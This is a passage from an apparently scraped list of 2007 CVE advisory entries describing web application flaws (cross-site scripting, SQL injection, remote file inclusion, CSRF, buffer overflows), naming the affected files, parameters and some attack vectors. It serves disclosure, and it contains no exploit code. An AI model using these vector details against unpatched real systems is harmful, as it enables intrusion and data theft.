\x00 sequence, a different vulnerability than CVE-2006-2563. [CVE-2007-4846] SQL injection vulnerability in start.php in Webace-Linkscript (wls) 1.3 Special Edition (SE) allows remote attackers to execute arbitrary SQL commands via the id parameter in a rubrik go action. [CVE-2007-4839] Unspecified vulnerability in the PD tools component in IBM WebSphere Application Server (WAS) 6.1 before Fix Pack 11 (6.1.0.11) has unknown impact and attack vectors, aka PK33803. [CVE-2007-4836] Cross-site scripting (XSS) vulnerability in index.php in phpMyQuote 0.20 allows remote attackers to inject arbitrary web script or HTML via the id parameter in an edit action. [CVE-2007-4833] Unspecified vulnerability in the Edge Component in IBM WebSphere Application Server (WAS) 6.1 before Fix Pack 11 (6.1.0.11) has unknown impact and attack vectors, aka PK44789. [CVE-2007-4831] Multiple cross-site scripting (XSS) vulnerabilities in account_settings.php in TorrentTrader 1.07 allow remote attackers to inject arbitrary web script or HTML via the (1) avatar and (2) title parameters. [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter. [CVE-2007-4828] Cross-site scripting (XSS) vulnerability in the API pretty-printing mode in MediaWiki 1.8.0 through 1.8.4, 1.9.0 through 1.9.3, 1.10.0 through 1.10.1, and the 1.11 development versions before 1.11.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-4822] Cross-site request forgery (CSRF) vulnerability in the device management interface in Buffalo AirStation WHR-G54S 1.20 allows remote attackers to make configuration changes as an administrator via HTTP requests to certain HTML pages in the res parameter with an inp req parameter to cgi-bin/cgi, as demonstrated by accessing (1) ap.html and (2) filter_ip.html. [CVE-2007-4819] Multiple cross-site scripting (XSS) vulnerabilities in Txx CMS 0.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-4815] Multiple PHP remote file inclusion vulnerabilities in WebED in Markus Iser ED Engine 0.8999 alpha allow remote attackers to execute arbitrary PHP code via a URL in the Codebase parameter to (1) channeledit.php, (2) post.php, (3) view.php, or (4) viewitem.php in source/mod/rss/. [CVE-2007-4813] Cross-site scripting (XSS) vulnerability in Domino Blogsphere 3.01 Beta 7 allows remote attackers to inject arbitrary web script or HTML via the name field. NOTE: the provenance of this information is unknown [CVE-2007-4811] Multiple cross-site scripting (XSS) vulnerabilities in Netjuke 1.0-rc2 allow remote attackers to inject arbitrary web script or HTML via (1) the val parameter to alphabet.php in an alpha.albums action, or the PATH_INFO to (2) random.php or (3) admin/hidden.php. [CVE-2007-4784] The setlocale function in PHP before 5.2.4 allows context-dependent attackers to cause a denial of service (application crash) via a long string in the locale parameter. NOTE: this might not be a vulnerability in most web server environments that support multiple threads, unless this issue can be demonstrated for code execution. [CVE-2007-4779] Cross-site scripting (XSS) vulnerability in Joomla! 1.5 before RC2 (aka Endeleo) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably related to the archive section. [CVE-2007-4760] The javadoc tool in Cosminexus Developer's Kit for Java in Cosminexus 7 and 7.5 can generate HTML documents that contain cross-site scripting (XSS) vulnerabilities, which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this is probably the same issue as CVE-2007-3503. [CVE-2007-4745] Multiple cross-site scripting (XSS) vulnerabilities in the AkoBook 3.42 and earlier component (com_akobook) for Mambo allow remote attackers to inject arbitrary web script or HTML via Javascript events in the (1) gbmail and (2) gbpage parameters in the sign function. [CVE-2007-4741] Cross-site scripting (XSS) vulnerability in admin/adminusers.php in Claroline before 1.8.6 allows remote authenticated administrators to inject arbitrary web script or HTML via the sort parameter. NOTE: the provenance of this information is unknown [CVE-2007-4726] Directory traversal vulnerability in Web Oddity 0.09b allows remote attackers to read arbitrary files via a .. (dot dot) in the URI. [CVE-2007-4717] Multiple cross-site scripting (XSS) vulnerabilities in Claroline before 1.8.6 allow remote authenticated administrators to inject arbitrary web script or HTML via the (1) dir parameter in admin/adminusers.php, the (2) action parameter in admin/advancedUserSearch.php, and the (3) view parameter in admin/campusProblem.php. [CVE-2007-4715] Multiple PHP remote file inclusion vulnerabilities in Weblogicnet allow remote attackers to execute arbitrary PHP code via a URL in the files_dir parameter in (1) es_desp.php, (2) es_custom_menu.php, and (3) es_offer.php. [CVE-2007-4713] Multiple cross-site scripting (XSS) vulnerabilities in urchin.cgi in Urchin 5.6.00r2 allow remote attackers to inject arbitrary web script or HTML via the (1) dtc, (2) vid, (3) n, (4) dt, (5) ed, and (6) bd parameters. [CVE-2007-4711] Multiple cross-site scripting (XSS) vulnerabilities in Toms Gaestebuch 1.00 allow remote attackers to inject arbitrary web script or HTML via the (1) homepage, (2) mail, and (3) name parameters in a show action to (a) form.php [CVE-2007-4701] WebKit on Apple Mac OS X 10.4 through 10.4.10 does not create temporary files securely when Safari is previewing a PDF file, which allows local users to read the contents of that file. [CVE-2007-4700] Unspecified vulnerability in WebKit on Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to use Safari as an indirect proxy and send attacker-controlled data to arbitrary TCP ports via unknown vectors. [CVE-2007-4697] Unspecified vulnerability in WebCore in Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to cause a denial of service (application termination) or execute arbitrary code via unknown vectors related to browser history, which triggers memory corruption. [CVE-2007-4696] Race condition in WebCore in Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to obtain information for forms from other sites via unknown vectors related to "page transitions" in Safari. [CVE-2007-4695] Unspecified "input validation" vulnerability in WebCore in Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to modify form field values via unknown vectors related to file uploads. [CVE-2007-4671] Unspecified vulnerability in Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to "alter or access" HTTPS content via an HTTP session with a crafted web page that causes Javascript to be applied to HTTPS pages from the same domain. [CVE-2007-4654] Unspecified vulnerability in SSHield 1.6.1 with OpenSSH 3.0.2p1 on Cisco WebNS 8.20.0.1 on Cisco Content Services Switch (CSS) series 11000 devices allows remote attackers to cause a denial of service (connection slot exhaustion and device crash) via a series of large packets designed to exploit the SSH CRC32 attack detection overflow (CVE-2001-0144), possibly a related issue to CVE-2002-1024. [CVE-2007-4650] Multiple unspecified vulnerabilities in Gallery before 2.2.3 allow attackers to (1) rename items, (2) read and modify item properties, or (3) lock and replace items via unknown vectors in (a) the WebDAV module [CVE-2007-4633] Multiple cross-site scripting (XSS) vulnerabilities in Cisco CallManager and Unified Communications Manager (CUCM) before 3.3(5)sr2b, 4.1 before 4.1(3)sr5, 4.2 before 4.2(3)sr2, and 4.3 before 4.3(1)sr1 allow remote attackers to inject arbitrary web script or HTML via the lang variable to the (1) user or (2) admin logon page, aka CSCsi10728. [CVE-2007-4630] Cross-site scripting (XSS) vulnerability in xlaapmview.asp in Absolute Poll Manager XE 4.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2007-4624] Cross-site scripting (XSS) vulnerability in pframe.php in AbleDesign Dynamic Picture Frame 1.00 allows remote attackers to inject arbitrary web script or HTML via the img_url parameter. NOTE: some of these details are obtained from third party information. [CVE-2007-4618] Unspecified vulnerability in BEA WebLogic Server 6.1 Gold through SP7 and 7.0 Gold through SP7 allows remote attackers to cause a denial of service (disk consumption) via certain malformed HTTP headers. [CVE-2007-4617] Unspecified vulnerability in BEA WebLogic Server 6.1 Gold through SP7, 7.0 Gold through SP7, and 8.1 Gold through SP4 allows remote attackers to cause a denial of service (server thread hang) via unspecified vectors. [CVE-2007-4616] The SSL server implementation in BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP1, and 10.0 sometimes selects the null cipher when no other cipher is compatible between the server and client, which might allow remote attackers to intercept communications. [CVE-2007-4615] The SSL client implementation in BEA WebLogic Server 7.0 SP7, 8.1 SP2 through SP6, 9.0, 9.1, 9.2 Gold through MP2, and 10.0 sometimes selects the null cipher when others are available, which might allow remote attackers to intercept communications. [CVE-2007-4614] BEA WebLogic Server 9.1 does not properly handle propagation of an admin server's security policy change log to temporarily unavailable managed servers, which might allow attackers to bypass intended restrictions, a different vulnerability than CVE-2007-0426. [CVE-2007-4613] SSL libraries in BEA WebLogic Server 6.1 Gold through SP7, 7.0 Gold through SP7, and 8.1 Gold through SP5 might allow remote attackers to obtain plaintext from an SSL stream via a man-in-the-middle attack that injects crafted data and measures the elapsed time before an error response, a different vulnerability than CVE-2006-2461. [CVE-2007-4597] SQL injection vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 RC 6 allows remote attackers to execute arbitrary SQL commands via the s[cid] parameter in a search_list action, a different vector than CVE-2007-2549. [CVE-2007-4595] Cross-site scripting (XSS) vulnerability in Mayaa before 1.1.12 allows remote attackers to inject arbitrary web script or HTML in certain circumstances involving (1) lack of charset specification within a META element or (2) a META element that specifies an unrecognized charset, which trigger automatic character set recognition by the web browser, as demonstrated by improper handling of UTF-7 data. [CVE-2007-4589] Multiple cross-site scripting (XSS) vulnerabilities in InterWorx Hosting Control Panel (InterWorx-CP) Webmaster Level (SiteWorx) 3.0.2 (1) allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php [CVE-2007-4588] Multiple cross-site scripting (XSS) vulnerabilities in InterWorx Hosting Control Panel (InterWorx-CP) Server Admin Level (NodeWorx) 3.0.2 (1) allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php [CVE-2007-4587] Cross-site scripting (XSS) vulnerability in Easy Software Cafeteria escafeWeb (aka Tuigwaa) 1.0 through 1.0.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to the setting of option.nopage.create in tuigwaa.properties. [CVE-2007-4557] Cross-site scripting (XSS) vulnerability in the webacc servlet in Novell GroupWise 6.5 WebAccess allows remote attackers to inject arbitrary web script or HTML via the User.Id parameter, as demonstrated by a URL within a url field in a STYLE element, possibly due to an incomplete fix for CVE-2004-2103.2. [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character. [CVE-2007-4554] Cross-site scripting (XSS) vulnerability in tiki-remind_password.php in Tikiwiki (aka Tiki CMS/Groupware) 1.9.7 allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: this issue might be related to CVE-2006-2635.7. [CVE-2007-4544] Cross-site scripting (XSS) vulnerability in wp-newblog.php in WordPress multi-user (MU) 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the weblog_id parameter (Username field). [CVE-2007-4543] Cross-site scripting (XSS) vulnerability in enter_bug.cgi in Bugzilla 2.17.1 through 2.20.4, 2.22.x before 2.22.3, and 3.x before 3.0.1 allows remote attackers to inject arbitrary web script or HTML via the buildid field in the "guided form." [CVE-2007-4542] Multiple cross-site scripting (XSS) vulnerabilities in MapServer before 4.10.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving the (1) processLine function in maptemplate.c and the (2) writeError function in mapserv.c in the mapserv CGI program. [CVE-2007-4541] Multiple cross-site scripting (XSS) vulnerabilities in Olate Download (od) 3.4.2 allow remote attackers to inject arbitrary web script or HTML via (1) the PHP_SELF variable in modules/core/uim.php and (2) [url] tags in a comment in modules/core/fldm.php. [CVE-2007-4530] Multiple cross-site scripting (XSS) vulnerabilities in TeamSpeak Server 2.0.20.1 allow remote attackers to inject arbitrary web script or HTML via (1) the error_text parameter to error_box.html or (2) the ok_title parameter to ok_box.html. [CVE-2007-4528] The Foreign Function Interface (ffi) extension in PHP 5.0.5 does not follow safe_mode restrictions, which allows context-dependent attackers to execute arbitrary code by loading an arbitrary DLL and calling a function, as demonstrated by kernel32.dll and the WinExec function. NOTE: this issue does not cross privilege boundaries in most contexts, so perhaps it should not be included in CVE. [CVE-2007-4523] Multiple cross-site scripting (XSS) vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote authenticated users to inject arbitrary web script or HTML via one or more of the following vectors: the (1) id parameter to (a) pages/delete_page.php, (b) navigation/delete_menu.php, and (c) navigation/delete_item.php in admin/ [CVE-2007-4522] Multiple SQL injection vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote authenticated users to execute arbitrary SQL commands via one or more of the following vectors: the (1) id parameter to (a) pages/delete_page.php, (b) navigation/delete_menu.php, and (c) navigation/delete_item.php in admin/ [CVE-2007-4512] Cross-site scripting (XSS) vulnerability in Sophos Anti-Virus for Windows 6.x before 6.5.8 and 7.x before 7.0.1 allows remote attackers to inject arbitrary web script or HTML via an archive with a file that matches a virus signature and has a crafted filename that is not properly handled by the print function in SavMain.exe. [CVE-2007-4488] Multiple cross-site scripting (XSS) vulnerabilities in the Siemens Gigaset SE361 WLAN router with firmware 1.00.0 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI immediately following the filename for (1) a GIF filename, which triggers display of the GIF file in text format and an unspecified denial of service (crash) [CVE-2007-4487] Cross-site scripting (XSS) vulnerability in D22-Shoutbox for Invision Power Board (IPB or IP.Board) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-4483] Cross-site scripting (XSS) vulnerability in index.php in the WordPress Classic 1.5 theme in WordPress before 2.1.3 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF). [CVE-2007-4482] Cross-site scripting (XSS) vulnerability in index.php in the Pool 1.0.7 theme for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF). [CVE-2007-4481] Cross-site scripting (XSS) vulnerability in index.php in the (1) Blix 0.9.1 and (2) Blix 0.9.1 Rus themes for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF). [CVE-2007-4480] Cross-site scripting (XSS) vulnerability in index.php in the Sirius 1.0 theme for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF). [CVE-2007-4479] Cross-site scripting (XSS) vulnerability in search.html in Search Engine Builder allows remote attackers to inject arbitrary web script or HTML via the searWords parameter. [CVE-2007-4478] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6.0 and 7 allows user-assisted remote attackers to inject arbitrary web script or HTML in the local zone via a URI, when the document at the associated URL is saved to a local file, which then contains the URI string along with the document's original content. [CVE-2007-4477] The administration interface in the Planet VC-200M VDSL2 router allows remote attackers to cause a denial of service (administration interface outage) via an HTTP request without a Host header. [CVE-2007-4475] Stack-based buffer overflow in EAI WebViewer3D ActiveX control (webviewer3d.dll) in SAP AG SAPgui before 7.10 Patch Level 9 allows remote attackers to execute arbitrary code via a long argument to the SaveViewToSessionFile method. [CVE-2007-4474] Multiple stack-based buffer overflows in the IBM Lotus Domino Web Access ActiveX control, as provided by inotes6.dll, inotes6w.dll, dwa7.dll, and dwa7w.dll, in Domino 6.x and 7.x allow remote attackers to execute arbitrary code, as demonstrated by an overflow from a long General_ServerName property value when calling the InstallBrowserHelperDll function in the Upload Module in the dwa7.dwa7.1 control in dwa7w.dll 7.0.34.1. [CVE-2007-4473] Gesytec Easylon OPC Server before 2.3.44 does not properly validate server handles, which allows remote attackers to execute arbitrary code or cause a denial of service via unspecified network traffic to the OLE for Process Control (OPC) interface, probably related to free operations on arbitrary memory addresses through certain Remove functions, and read and write operations on arbitrary memory addresses through certain Set, Read, and Write functions. [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection. [CVE-2007-4453] DISPUTED Multiple cross-site scripting (XSS) vulnerabilities in vBulletin 3.6.8 allow remote attackers to inject arbitrary web code or HTML via the (1) s parameter to index.php, and the (2) q parameter to (a) faq.php, (b) member.php, (c) memberlist.php, (d) calendar.php, (e) search.php, (f) forumdisplay.php, (g) showgroups.php, (h) online.php, and (i) sendmessage.php. NOTE: these issues have been disputed by the vendor, stating "I can't reproduce a single one of these". The researcher is known to be unreliable. [CVE-2007-4442] Stack-based buffer overflow in the logging function in the Unreal engine, possibly 2003 and 2004, as used in the internal web server, allows remote attackers to cause a denial of service (application crash) via a request for a long .gif filename in the images/ directory, related to conversion from Unicode to ASCII. [CVE-2007-4438] Session fixation vulnerability in Ampache before 3.3.3.5 allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2007-4434] Cross-site scripting (XSS) vulnerability in textfilesearch.asp in the Text File Search ASP (Classic) edition allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2007-4433] Cross-site scripting (XSS) vulnerability in textfilesearch.aspx in the Text File Search ASP.NET edition allows remote attackers to inject arbitrary web script or HTML via the search field. [CVE-2007-4424] Apple Safari for Windows 3.0.3 and earlier does not prompt the user before downloading a file, which allows remote attackers to download arbitrary files to the desktop of a client system via certain HTML, as demonstrated by a filename in the DATA attribute of an OBJECT element. NOTE: it could be argued that this is not a vulnerability because a dangerous file is not actually launched, but as of 2007, it is generally accepted that web browsers should prompt users before saving dangerous content. [CVE-2007-4422] The login interface in Symantec Enterprise Firewall 6.x, when a VPN with pre-shared key (PSK) authentication is enabled, generates different responses depending on whether or not a username is valid, which allows remote attackers to enumerate valid usernames. [CVE-2007-4412] Multiple cross-site scripting (XSS) vulnerabilities in Headstart Solutions DeskPRO 3.0.2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified parameters to (1) techs.php, (2) ticket_category.php, (3) ticket_priority.php, (4) ticket_workflow.php, (5) ticket_escalate.php, (6) fields_ticket.php, (7) ticket_rules_web.php, (8) ticket_displayfields.php, (9) ticket_rules_mail.php, (10) fields_user.php, (11) fields_faq.php, and (12) user_help.php, in (a) admincp/ and (b) possibly a directory on the "User side." [CVE-2007-4391] Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an "invite to view my webcam" request, and then injecting a DLL into the attacker's peer Yahoo! Messenger application when this request is accepted. [CVE-2007-4390] The Command Line Interface (CLI), aka Adonis Administration Console, on the BlueCat Networks Adonis DNS/DHCP appliance 5.0.2.8 allows local admin users to gain root privileges on the underlying operating system via shell metacharacters in a command. [CVE-2007-4375] The administrative interface (aka DkService.exe) in Diskeeper 9 Professional, 2007 Pro Premier, and probably other versions exposes a memory comparison function via RPC over TCP, which allows remote attackers to (1) obtain sensitive information (process memory contents), as demonstrated by an attack that obtains module base addresses to defeat Address Space Layout Randomization (ASLR) [CVE-2007-4368] SQL injection vulnerability in /main in IBM Rational ClearQuest (CQ) Web 7.0.0.0-IFIX02 and 7.0.0.1 allows remote attackers to execute arbitrary SQL commands via the username parameter in a GenerateMainFrame command. [CVE-2007-4365] Cross-site scripting (XSS) vulnerability in eXV2 CMS 2.0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a set_lang cookie to an unspecified component. NOTE: this may overlap CVE-2007-1965. [CVE-2007-4364] Fedora Commons before 2.2.1 does not properly handle certain authentication requests involving Java Naming and Directory Interface (JNDI), related to (1) a nonexistent account name in combination with an empty password, which allows remote attackers to trigger a certain "unexpected / strange response" from an LDAP server, and (2) a reauthentication attempt that throws an exception, which allows remote attackers to trigger use of a cached authentication decision. NOTE: authentication can be bypassed by using vector 1 followed by vector 2, and possibly can be bypassed by using a single vector. [CVE-2007-4363] Multiple cross-site scripting (XSS) vulnerabilities in the nodereference module in Drupal Content Construction Kit (CCK) before 4.7.x-1.6, and 5.x before 5.x-1.6 ,allow remote attackers to inject arbitrary web script or HTML via nodereference fields, when using (1) the plain formatter or (2) the autocomplete text field widget without Views.module. [CVE-2007-4362] SQL injection vulnerability in category.php in Prozilla Webring allows remote attackers to execute arbitrary SQL commands via the cat parameter. [CVE-2007-4334] Cross-site scripting (XSS) vulnerability in whois.php in Php-stats 0.1.9.2 allows remote attackers to inject arbitrary web script or HTML via the IP parameter. [CVE-2007-4333] Multiple cross-site scripting (XSS) vulnerabilities in signup.php in Article Dashboard allow remote attackers to inject arbitrary web script or HTML via the (1) f_emailaddress, (2) f_reemailaddress, and other unspecified parameters. NOTE: the provenance of this information is unknown [CVE-2007-4329] Multiple PHP remote file inclusion vulnerabilities in Web News 1.1 allow remote attackers to execute arbitrary PHP code via a URL in the config[root_ordner] parameter to (1) index.php, (2) news.php, or (3) feed.php. [CVE-2007-4319] The management interface in ZyNOS firmware 3.62(WK.6) on the Zyxel Zywall 2 device allows remote authenticated administrators to cause a denial of service (infinite reboot loop) via invalid configuration data. NOTE: this issue might not cross privilege boundaries, and it might be resultant from CSRF [CVE-2007-4317] Multiple cross-site request forgery (CSRF) vulnerabilities in the management interface in ZyNOS firmware 3.62(WK.6) on the Zyxel Zywall 2 device allow remote attackers to perform certain actions as administrators, as demonstrated by a request to Forms/General_1 with the (1) sysSystemName and (2) sysDomainName parameters. [CVE-2007-4316] The management interface in ZyNOS firmware 3.62(WK.6) on the Zyxel Zywall 2 device has a certain default password, which allows remote attackers to perform administrative actions. [CVE-2007-4307] Multiple cross-site scripting (XSS) vulnerabilities in Storesprite 7 and earlier allow remote attackers to inject arbitrary web script or HTML via the next parameter to (1) addaddress.php, (2) editshipdetails.php, (3) register.php, or (4) login.php in secure/. [CVE-2007-4306] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 2.10.3 allow remote attackers to inject arbitrary web script or HTML via the (1) unlim_num_rows, (2) sql_query, or (3) pos parameter to (a) tbl_export.php [CVE-2007-4297] Multiple cross-site scripting (XSS) vulnerabilities in yorumkaydet.asp in Dersimiz Haber Ekleme Modulu allow remote attackers to inject arbitrary web script or HTML via the (1) yazan, (2) mail, and (3) yorum parameters. NOTE: some of these details are obtained from third party information. [CVE-2007-4284] Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified MeetingPlace Web Conferencing (MP) 5.3.235.0 and earlier allow remote attackers to inject arbitrary HTML and web script via the (1) Success Template (STPL) and (2) Failure Template (FTPL) parameters, which are not properly handled in an error message. [CVE-2007-4281] Cross-site scripting (XSS) vulnerability in KnowledgeTree Open Source 3.4 and 3.4.1 allows remote attackers to inject arbitrary web script or HTML via the login field on the login page, and other unspecified vectors. [CVE-2007-4265] Multiple cross-site scripting (XSS) vulnerabilities in VisionProject 3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) projectIssueId parameter in EditProjectIssue.do, the (2) projectId parameter in ProjectSelected.do, the (3) folderId parameter in ProjectDocuments.do and the (4) sortField parameter in ProjectIssues.do. [CVE-2007-4264] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Kai Blankenhorn Bitfolge simple and nice index file (aka snif) 1.5.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) path and (2) download parameters. [CVE-2007-4261] EZPhotoSales 1.9.3 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download (1) a file containing cleartext passwords via a direct request for OnlineViewing/data/galleries.txt, or (2) a file containing username hashes and password hashes via a direct request for OnlineViewing/configuration/config.dat/. NOTE: vector 2 can be leveraged for administrative access because authentication does not require knowledge of cleartext values, but instead uses the username hash in the ConfigLogin parameter and the password hash in the ConfigPassword parameter. [CVE-2007-4259] EZPhotoSales 1.9.3 and earlier allows remote attackers to download arbitrary image files via (1) a direct request for a URL under OnlineViewing/galleries/ or (2) navigation of the gallery user interface with JavaScript disabled. [CVE-2007-4245] Cross-site scripting (XSS) vulnerability in Search.php in DiMeMa CONTENTdm (CDM) allows remote attackers to inject arbitrary web script or HTML via a search, probably related to the CISOBOX1 parameter to results.php in CDM 4.2. [CVE-2007-4240] The check_logout function in class/auth.php in Help Center Live (hcl) 2.1.3a sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to delete administrative users and have other unspecified impact via certain requests to (1) admin/departments.php, (2) admin/operators.php, and other unspecified scripts. NOTE: some of these details are obtained from third party information. [CVE-2007-4239] Cross-site scripting (XSS) vulnerability in user/forgotPassStep2.jsp in the admin interface in C-SAM oneWallet 210_07062007 [CVE-2007-4212] Multiple cross-site scripting (XSS) vulnerabilities in the Search Module in PHP-Nuke allow remote attackers to inject arbitrary web script or HTML via a trailing "<" instead of a ">" in (1) the onerror attribute of an IMG element, (2) the onload attribute of an IFRAME element, or (3) redirect users to other sites via the META tag. [CVE-2007-4204] Hitachi Groupmax Collaboration - Schedule, as used in Groupmax Collaboration Portal 07-32 through 07-32-/B, uCosminexus Collaboration Portal 06-32 through 06-32-/B, and Groupmax Collaboration Web Client - Mail/Schedule 07-32 through 07-32-/A, can assign schedule data to the wrong user under unspecified conditions, which might allow remote authenticated users to obtain sensitive information. [CVE-2007-4203] Session fixation vulnerability in Mambo 4.6.2 CMS allows remote attackers to hijack web sessions by setting the Cookie parameter. [CVE-2007-4192] Multiple cross-site scripting (XSS) vulnerabilities in IDE Group DVD Rental System (DRS) 5.1 before 20070801 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: it is not clear whether IDE Group updates all DRS installations in its role as an application service provider. If so, then this issue should not be included in CVE. [CVE-2007-4189] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.13 (aka Sunglow) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in the (1) com_search, (2) com_content, and (3) mod_login components. NOTE: some of these details are obtained from third party information. [CVE-2007-4188] Session fixation vulnerability in Joomla! before 1.0.13 (aka Sunglow) allows remote attackers to hijack administrative web sessions via unspecified vectors. [CVE-2007-4182] Unrestricted file upload vulnerability in index.php in WikiWebWeaver 1.1 and earlier allows remote attackers to upload and execute arbitrary PHP code via an upload action specifying a filename with a double extension such as .gif.php, which is accessible from data/documents/. [CVE-2007-4178] Cross-site scripting (XSS) vulnerability in index.php in WebDirector 2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the deslocal parameter. [CVE-2007-4177] Multiple cross-site scripting (XSS) vulnerabilities in Interact before 2.4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this might overlap CVE-2007-3328. [CVE-2007-4175] Multiple cross-site scripting (XSS) vulnerabilities in index.php in OpenRat CMS 0.8-beta1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) subaction and (2) action parameters. [CVE-2007-4174] Tor before 0.1.2.16, when ControlPort is enabled, does not properly restrict commands to localhost port 9051, which allows remote attackers to modify the torrc configuration file, compromise anonymity, and have other unspecified impact via HTTP POST data containing commands without valid authentication, as demonstrated by an HTML form (1) hosted on a web site or (2) injected by a Tor exit node. [CVE-2007-4172] Multiple cross-site scripting (XSS) vulnerabilities in Open Webmail (OWM) 2.52 20060831 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) searchtype, (2) longpage, and (3) page parameters to (a) openwebmail-main.pl [CVE-2007-4166] Cross-site scripting (XSS) vulnerability in index.php in the Unnamed theme 1.217, and Special Edition (SE) 1.02, before 20070804 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757, CVE-2007-4014, and CVE-2007-4165. NOTE: some of these details are obtained from third party information. [CVE-2007-4165] Cross-site scripting (XSS) vulnerability in index.php in the Blue Memories theme 1.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757 and CVE-2007-4014. NOTE: the provenance of this information is unknown [CVE-2007-4164] CRLF injection vulnerability in the redirect feature in Sun Java System Web Server 6.1 and 7.0 before 20070802, when the redirect Server Application Function (SAF) uses the url-prefix parameter and escape is disabled, or an Error directive uses the url-prefix parameter in obj.conf, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks. [CVE-2007-4159] index.html in the HTTP administration interface in certain daemons in TIBCO Rendezvous (RV) 7.5.2 allows remote attackers to obtain sensitive information, such as a user name and IP addresses, via a direct request. [CVE-2007-4157] PHPBlogger stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing an admin password hash via a direct request for data/pref.db. NOTE: this can be easily leveraged for administrative access because composing the authentication cookie only requires the password hash, not the cleartext version. [CVE-2007-4153] Multiple cross-site scripting (XSS) vulnerabilities in WordPress 2.2.1 allow remote authenticated administrators to inject arbitrary web script or HTML via (1) the Options Database Table in the Admin Panel, accessed through options.php [CVE-2007-4146] Cross-site scripting (XSS) vulnerability in webevent.cgi in WebEvent 2.61 through 4.03 allows remote attackers to inject arbitrary web script or HTML via the cmd parameter. NOTE: the provenance of this information is unknown [CVE-2007-4144] Cross-site scripting (XSS) vulnerability in sample-forms/simple-contact-form-with-preview/simple-contact-form-with-preview.html in MitriDAT eMail Form Processor Pro allows remote attackers to inject arbitrary web script or HTML via the base_path parameter, possibly related to (1) formprocessorpro.php in the PHP version of the product, and (2) formprocessorpro.pl in the Perl version of the product. [CVE-2007-4142] Cross-site scripting (XSS) vulnerability in IBM Lotus Sametime Server 7.5.1 before 20070731 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving a crafted Sametime meeting. [CVE-2007-4139] Cross-site scripting (XSS) vulnerability in the Temporary Uploads editing functionality (wp-admin/includes/upload.php) in WordPress 2.2.1, allows remote attackers to inject arbitrary web script or HTML via the style parameter to wp-admin/upload.php. [CVE-2007-4117] DISPUTED PHP remote file inclusion vulnerability in index.php in phpWebFileManager 0.5 allows remote attackers to execute arbitrary PHP code via a URL in the PN_PathPrefix parameter. NOTE: this issue is disputed by a reliable third party, who demonstrates that PN_PathPrefix is defined before use. [CVE-2007-4115] Multiple cross-site scripting (XSS) vulnerabilities in IT!CMS (itcms) 0.2 allow remote attackers to inject arbitrary web script or HTML via the wndtitle parameter to (1) lang-en.php, (2) menu-ed.php, or (3) 